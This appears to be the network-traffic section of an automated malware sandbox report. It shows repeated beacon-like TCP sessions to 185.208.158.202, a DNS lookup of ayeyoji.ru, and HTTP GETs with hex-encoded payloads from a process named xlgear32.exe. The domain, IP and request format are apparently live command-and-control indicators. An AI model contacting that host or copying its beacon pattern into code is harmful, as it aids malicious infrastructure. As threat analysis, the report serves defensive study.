                                                                        Nov 30, 2024 02:34:18.400803089 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:18.400825977 CET4979580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:18.401058912 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:18.521006107 CET8049800185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:19.841476917 CET8049800185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:19.845585108 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:19.968292952 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:19.968590975 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:20.088435888 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:20.088620901 CET8049800185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:20.088771105 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:20.089040995 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:20.089040995 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:20.208970070 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:21.511260986 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:21.511567116 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:21.624417067 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:21.744282007 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:22.101311922 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:22.101381063 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.382354975 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.386368036 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.502546072 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:22.502618074 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.506269932 CET8049809185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:22.506351948 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.510927916 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.630809069 CET8049809185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:23.884879112 CET8049809185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:23.884938955 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:23.998876095 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:23.999216080 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:24.176381111 CET8049814185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:24.176397085 CET8049809185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:24.176506996 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:24.176518917 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:24.176803112 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:24.296818972 CET8049814185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:25.556432009 CET8049814185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:25.556492090 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.670952082 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.671250105 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.791266918 CET8049820185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:25.791400909 CET8049814185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:25.791511059 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.791538954 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.791766882 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.911608934 CET8049820185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:27.189121008 CET8049820185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:27.189408064 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.312123060 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.312432051 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.432490110 CET8049825185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:27.432507038 CET8049820185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:27.432620049 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.432646036 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.432925940 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.552746058 CET8049825185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:28.850276947 CET8049825185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:28.850327015 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:28.967328072 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:28.967669010 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:29.087527037 CET8049825185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:29.087548971 CET8049828185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:29.087709904 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:29.087764978 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:29.087987900 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:29.207875967 CET8049828185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:30.470597982 CET8049828185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:30.470731020 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.592765093 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.593074083 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.713043928 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:30.713177919 CET8049828185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:30.713259935 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.713304043 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.713514090 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.833376884 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.109592915 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.109688044 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.217515945 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.337502956 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.691086054 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.691157103 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.811235905 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.811549902 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.932055950 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.932080984 CET8049839185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.932176113 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.932218075 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.932424068 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:33.052288055 CET8049839185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:34.309799910 CET8049839185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:34.309928894 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.439785957 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.440141916 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.560129881 CET8049844185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:34.560152054 CET8049839185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:34.560234070 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.560262918 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.631422043 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.751395941 CET8049844185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:35.942440033 CET8049844185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:35.944752932 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.061141014 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.061429977 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.181315899 CET8049849185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:36.181371927 CET8049844185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:36.181521893 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.181535006 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.181797981 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.301757097 CET8049849185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:37.661833048 CET8049849185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:37.661937952 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.784380913 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.784852982 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.905019045 CET8049849185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:37.905126095 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.905194998 CET8049853185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:37.905273914 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.905771017 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:38.025670052 CET8049853185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:39.304721117 CET8049853185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:39.304888010 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.420496941 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.420835972 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.540684938 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:39.540762901 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.540852070 CET8049853185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:39.540896893 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.541003942 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.660795927 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:40.919466972 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:40.919548988 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.030101061 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.150053978 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:41.502412081 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:41.503612995 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.623684883 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.623995066 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.743902922 CET8049864185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:41.744030952 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:41.744155884 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.744174004 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.744410038 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.864295959 CET8049864185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:43.116338015 CET8049864185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:43.116466045 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.233156919 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.233530998 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.353444099 CET8049864185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:43.353470087 CET8049869185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:43.353588104 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.353630066 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.353902102 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.473754883 CET8049869185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:44.735771894 CET8049869185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:44.735836983 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.842367887 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.842696905 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.962610006 CET8049873185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:44.962800026 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.962877989 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.963287115 CET8049869185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:44.963335037 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:45.082739115 CET8049873185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:46.404664040 CET8049873185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:46.404794931 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.521770000 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.522124052 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.641990900 CET8049878185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:46.642059088 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.642117977 CET8049873185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:46.642191887 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.642376900 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.762418032 CET8049878185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:48.037117958 CET8049878185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:48.037209988 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.154921055 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.155200958 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.275046110 CET8049878185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:48.275084019 CET8049883185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:48.275151014 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.275219917 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.275427103 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.396260977 CET8049883185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:49.693346024 CET8049883185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:49.693432093 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.811206102 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.811477900 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.931391954 CET8049888185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:49.931528091 CET8049883185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:49.931550980 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.931586027 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.931793928 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:50.051645994 CET8049888185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:51.306162119 CET8049888185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:51.306229115 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.473712921 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.477802038 CET4989180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.594193935 CET8049888185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:51.594249964 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.597675085 CET8049891185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:51.597743034 CET4989180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.609775066 CET4989180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.729650021 CET8049891185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:53.020618916 CET8049891185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:53.021656036 CET4989180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:53.139545918 CET4989180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:53.139858007 CET4989680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:53.259752035 CET8049891185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:53.259766102 CET8049896185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:53.259852886 CET4989180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:53.259881973 CET4989680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:53.260059118 CET4989680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:53.379936934 CET8049896185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:54.635322094 CET8049896185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:54.635452986 CET4989680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:54.751071930 CET4989680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:54.756572962 CET4990180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:54.871299028 CET8049896185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:54.871359110 CET4989680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:54.876502991 CET8049901185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:54.876574039 CET4990180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:54.876821995 CET4990180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:54.996762991 CET8049901185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:56.331507921 CET8049901185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:56.331578016 CET4990180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:56.455981016 CET4990180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:56.456423998 CET4990580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:56.576117039 CET8049901185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:56.576191902 CET4990180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:56.576307058 CET8049905185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:56.576379061 CET4990580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:56.577852964 CET4990580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:56.697689056 CET8049905185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:57.905153990 CET8049905185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:57.905242920 CET4990580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:58.016191959 CET4990580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:58.016494989 CET4991080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:58.136452913 CET8049905185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:58.136466026 CET8049910185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:58.136523962 CET4990580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:58.136563063 CET4991080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:58.136842012 CET4991080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:58.256668091 CET8049910185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:59.511039972 CET8049910185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:59.511137009 CET4991080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:59.628184080 CET4991080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:59.628520012 CET4991580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:59.748548985 CET8049910185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:59.748567104 CET8049915185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:59.748604059 CET4991080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:59.748658895 CET4991580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:59.749279976 CET4991580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:59.869153976 CET8049915185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:01.180387020 CET8049915185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:01.180444956 CET4991580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:01.307809114 CET4991580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:01.308211088 CET4992080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:01.427999973 CET8049915185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:01.428054094 CET4991580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:01.428080082 CET8049920185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:01.428174973 CET4992080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:01.428373098 CET4992080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:01.548226118 CET8049920185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:02.800364017 CET8049920185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:02.800432920 CET4992080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:02.924017906 CET4992080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:02.924439907 CET4992380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:03.044697046 CET8049920185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:03.044711113 CET8049923185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:03.044766903 CET4992080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:03.044810057 CET4992380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:03.045042992 CET4992380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:35:03.164876938 CET8049923185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:04.463563919 CET8049923185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:35:04.465735912 CET4992380192.168.2.4185.208.158.202

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 30, 2024 02:33:51.737341881 CET5105253192.168.2.4141.98.234.31
                                                                        Nov 30, 2024 02:33:52.050406933 CET5351052141.98.234.31192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 30, 2024 02:33:51.737341881 CET192.168.2.4141.98.234.310xbdc9Standard query (0)ayeyoji.ruA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 30, 2024 02:33:52.050406933 CET141.98.234.31192.168.2.40xbdc9No error (0)ayeyoji.ru185.208.158.202A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • ayeyoji.ru

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449736185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:33:52.217340946 CET317OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:33:53.594434977 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:33:53 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Nov 30, 2024 02:33:53.701723099 CET317OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:33:54.179733038 CET1084INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:33:53 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 33 36 63 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 62 37 36 35 62 62 33 37 34 66 30 36 37 62 37 33 32 35 36 63 30 65 30 64 35 30 65 63 61 34 32 63 64 37 64 62 30 31 62 66 64 33 32 38 38 33 38 65 33 31 36 62 38 36 37 63 37 35 61 61 35 65 61 34 65 65 37 35 62 37 66 34 33 65 63 32 66 36 36 39 34 33 64 37 39 38 63 66 66 31 32 64 65 65 64 39 30 39 39 32 35 63 39 36 61 39 63 31 33 64 38 35 30 38 66 32 31 62 37 35 30 62 36 66 37 35 65 32 39 65 34 36 35 64 62 66 34 36 37 62 30 38 39 65 35 64 30 34 61 65 36 33 35 63 38 31 35 33 30 34 33 35 62 32 38 65 32 33 62 37 33 30 66 37 38 62 38 65 63 38 34 66 34 38 37 32 64 35 31 65 36 35 37 37 32 32 33 65 30 32 63 35 65 65 39 66 64 65 36 38 64 65 34 33 66 37 65 61 37 65 37 34 32 39 32 38 34 66 62 37 31 32 36 31 [TRUNCATED]
